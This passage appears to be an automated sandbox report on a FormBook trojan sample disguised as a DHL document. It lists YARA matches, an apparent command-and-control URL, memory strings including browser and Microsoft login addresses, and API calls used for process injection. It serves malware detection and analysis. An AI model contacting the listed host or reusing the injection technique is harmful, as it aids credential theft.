server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Dec 2024 08:31:29 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Dec 2024 08:31:31 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Source: YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3878718272.00000000050A8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3878718272.00000000050A8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.3878368158.0000000004862000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.0000000003B02000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.3878368158.0000000004862000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.0000000003B02000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000003.1784251953.0000000007A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.3878368158.0000000004EAA000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.000000000414A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?BR14=mxnR
Source: netbtugc.exe, 00000004.00000002.3878368158.000000000453E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3880747412.0000000006200000.00000004.00000800.00020000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.00000000037DE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.00000000037DE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00ADEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00ADEAFF

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00ADED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00ADED6A

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

0_2_00ADEAFF

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00ACAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_00ACAA57

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00AF9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: DHL 745-12302024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DHL 745-12302024.exe, 00000000.00000000.1409027106.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4576f919-5
Source: DHL 745-12302024.exe, 00000000.00000000.1409027106.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3ed4c0b6-9
Source: DHL 745-12302024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4d225111-d
Source: DHL 745-12302024.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_f7628c67-4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0262B363 NtClose,	2_2_0262B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02601D09 NtProtectVirtualMemory,	2_2_02601D09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B60 NtClose,LdrInitializeThunk,	2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,	2_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074340 NtSetContextThread,	2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074650 NtSuspendThread,	2_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B80 NtQueryInformationFile,	2_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BA0 NtEnumerateValueKey,	2_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BE0 NtQueryValueKey,	2_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BF0 NtAllocateVirtualMemory,	2_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AB0 NtWaitForSingleObject,	2_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AD0 NtReadFile,	2_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AF0 NtWriteFile,	2_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F30 NtCreateSection,	2_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F60 NtCreateProcessEx,	2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F90 NtProtectVirtualMemory,	2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FA0 NtQuerySection,	2_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FB0 NtResumeThread,	2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FE0 NtCreateFile,	2_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E30 NtWriteVirtualMemory,	2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E80 NtReadVirtualMemory,	2_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EA0 NtAdjustPrivilegesToken,	2_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EE0 NtQueueApcThread,	2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D00 NtSetInformationFile,	2_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D10 NtMapViewOfSection,	2_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D30 NtUnmapViewOfSection,	2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DB0 NtEnumerateKey,	2_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DD0 NtDelayExecution,	2_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C00 NtQueryInformationProcess,	2_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C60 NtCreateKey,	2_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CA0 NtQueryInformationToken,	2_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CC0 NtQueryVirtualMemory,	2_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CF0 NtOpenProcess,	2_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073010 NtOpenDirectoryObject,	2_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073090 NtSetValueKey,	2_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030739B0 NtGetContextThread,	2_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D10 NtOpenProcessToken,	2_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D70 NtOpenThread,	2_2_03073D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C4340 NtSetContextThread,LdrInitializeThunk,	4_2_033C4340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C4650 NtSuspendThread,LdrInitializeThunk,	4_2_033C4650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2B60 NtClose,LdrInitializeThunk,	4_2_033C2B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_033C2BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_033C2BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_033C2BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2AF0 NtWriteFile,LdrInitializeThunk,	4_2_033C2AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2AD0 NtReadFile,LdrInitializeThunk,	4_2_033C2AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2F30 NtCreateSection,LdrInitializeThunk,	4_2_033C2F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2FB0 NtResumeThread,LdrInitializeThunk,	4_2_033C2FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2FE0 NtCreateFile,LdrInitializeThunk,	4_2_033C2FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_033C2E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_033C2EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_033C2D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_033C2D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_033C2DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_033C2DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_033C2C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2C60 NtCreateKey,LdrInitializeThunk,	4_2_033C2C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_033C2CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C35C0 NtCreateMutant,LdrInitializeThunk,	4_2_033C35C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C39B0 NtGetContextThread,LdrInitializeThunk,	4_2_033C39B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2B80 NtQueryInformationFile,	4_2_033C2B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2AB0 NtWaitForSingleObject,	4_2_033C2AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2F60 NtCreateProcessEx,	4_2_033C2F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2FA0 NtQuerySection,	4_2_033C2FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2F90 NtProtectVirtualMemory,	4_2_033C2F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2E30 NtWriteVirtualMemory,	4_2_033C2E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2EA0 NtAdjustPrivilegesToken,	4_2_033C2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2D00 NtSetInformationFile,	4_2_033C2D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2DB0 NtEnumerateKey,	4_2_033C2DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2C00 NtQueryInformationProcess,	4_2_033C2C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2CF0 NtOpenProcess,	4_2_033C2CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C2CC0 NtQueryVirtualMemory,	4_2_033C2CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C3010 NtOpenDirectoryObject,	4_2_033C3010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C3090 NtSetValueKey,	4_2_033C3090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C3D10 NtOpenProcessToken,	4_2_033C3D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C3D70 NtOpenThread,	4_2_033C3D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00817920 NtCreateFile,	4_2_00817920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00817A70 NtReadFile,	4_2_00817A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00817BE0 NtClose,	4_2_00817BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00817B50 NtDeleteFile,	4_2_00817B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00817D30 NtAllocateVirtualMemory,	4_2_00817D30

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00ACD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00ACD5EB

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AC1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00AC1201

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00ACE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00ACE8F6

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A68060	0_2_00A68060
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD2046	0_2_00AD2046
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AC8298	0_2_00AC8298
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A9E4FF	0_2_00A9E4FF
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A9676B	0_2_00A9676B
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AF4873	0_2_00AF4873
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A8CAA0	0_2_00A8CAA0
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A6CAF0	0_2_00A6CAF0
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A7CC39	0_2_00A7CC39
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A96DD9	0_2_00A96DD9
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A7D065	0_2_00A7D065
